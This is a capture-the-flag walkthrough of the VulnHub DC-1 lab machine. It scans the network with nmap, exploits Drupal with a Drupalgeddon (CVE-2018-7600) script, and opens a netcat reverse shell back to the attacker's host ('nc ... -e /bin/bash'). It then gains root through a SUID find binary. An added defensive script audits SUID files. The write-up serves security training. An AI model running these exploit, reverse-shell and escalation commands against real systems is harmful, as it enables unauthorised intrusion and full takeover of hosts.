DC-1 – Writeup

Details

This machine is https://www.vulnhub.com/entry/dc-1-1,292/

Recon Phase

Start by finding the target

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00020s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00015s latency).
MAC Address: 08:00:27:8B:07:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00052s latency).
MAC Address: 08:00:27:AA:94:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.76 seconds

Service discovery

root@kali:~# nmap -sV -p- 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00015s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
44068/tcp open  status  1 (RPC #100024)

Shell Hunting

Onto port 80 at http://192.168.56.102/

Screenshot 1

Drupal, no changelog, but I’ll try Drupalgeddon (https://github.com/Jack-Barradell/exploits/tree/master/CVE-2018-7600), first opening a listener to check with

root@kali:~# nc -nlvp 4444

Trigger a test

root@kali:~# python3 cve-2018-7600-drupal7.py -t 192.168.56.102 -c "nc 192.168.56.101 4444"
[+] Sending command exploit
[+] Prepping trigger
[+] Sending trigger
[+] Result:

And back in the listener

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 55724

Now I’ll do it again but get a shell

root@kali:~# nc -nlvp 4444
root@kali:~# python3 cve-2018-7600-drupal7.py -t 192.168.56.102 -c "nc 192.168.56.101 4444 -e /bin/bash"
[+] Sending command exploit
[+] Prepping trigger
[+] Sending trigger
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 55726
$

and that’s a shell

Root Hunting

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www$
www-data@DC-1:/var/www$ find / -perm -u=s 2>/dev/null
[SNIP]
/usr/bin/find
[SNIP]

Well that’s nice

www-data@DC-1:/var/www$ find . -exec /bin//sh \;
#

That’s a shell

# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
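
The euid=0 above comes from nothing more than the SUID bit on /usr/bin/find, which is something a host audit can catch. An added example, not part of the original writeup: a shell check that classifies SUID files against a baseline. The two name lists and every sample path except /usr/bin/find are assumptions.

```shell
#!/bin/sh
# Added example: flag risky SUID binaries such as the /usr/bin/find seen above.

# Assumption: SUID binaries expected on a stock Debian-like install.
EXPECTED="passwd su sudo mount umount chsh chfn newgrp gpasswd"
# Assumption: illustrative list of tools that can launch other programs,
# so a SUID bit on them hands out the owner's privileges.
EXEC_CAPABLE="find env awk vi vim less more sh bash dash python perl"

# Reads one path per line on stdin, prints "LEVEL path" for each finding.
classify_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case " $EXEC_CAPABLE " in
            *" $name "*) echo "CRITICAL $path"; continue ;;
        esac
        case " $EXPECTED " in
            *" $name "*) ;;                 # in the baseline, stay quiet
            *) echo "REVIEW $path" ;;       # unknown SUID file, check by hand
        esac
    done
}

# Walks a tree for regular files with the setuid bit and classifies them.
audit_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | classify_suid
}

# Constructed sample of find output; only /usr/bin/find comes from the page.
SAMPLE="/usr/bin/passwd
/bin/su
/usr/bin/find
/usr/local/bin/backup"

printf '%s\n' "$SAMPLE" | classify_suid
```

On a real host, call audit_suid / as root and clear the bit on anything reported CRITICAL with chmod u-s.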

Rooted, flag time

# cd /root
# ls -la
drwx------  4 root root 4096 Feb 28 12:11 .
drwxr-xr-x 23 root root 4096 Feb 19 22:34 ..
drwx------  2 root root 4096 Feb 19 22:30 .aptitude
-rw-------  1 root root   44 Feb 28 12:11 .bash_history
-rw-r--r--  1 root root  949 Feb 19 23:03 .bashrc
drwxr-xr-x  3 root root 4096 Feb 19 23:03 .drush
-rw-r--r--  1 root root  140 Nov 20  2007 .profile
-rw-r--r--  1 root root  173 Feb 19 23:43 thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
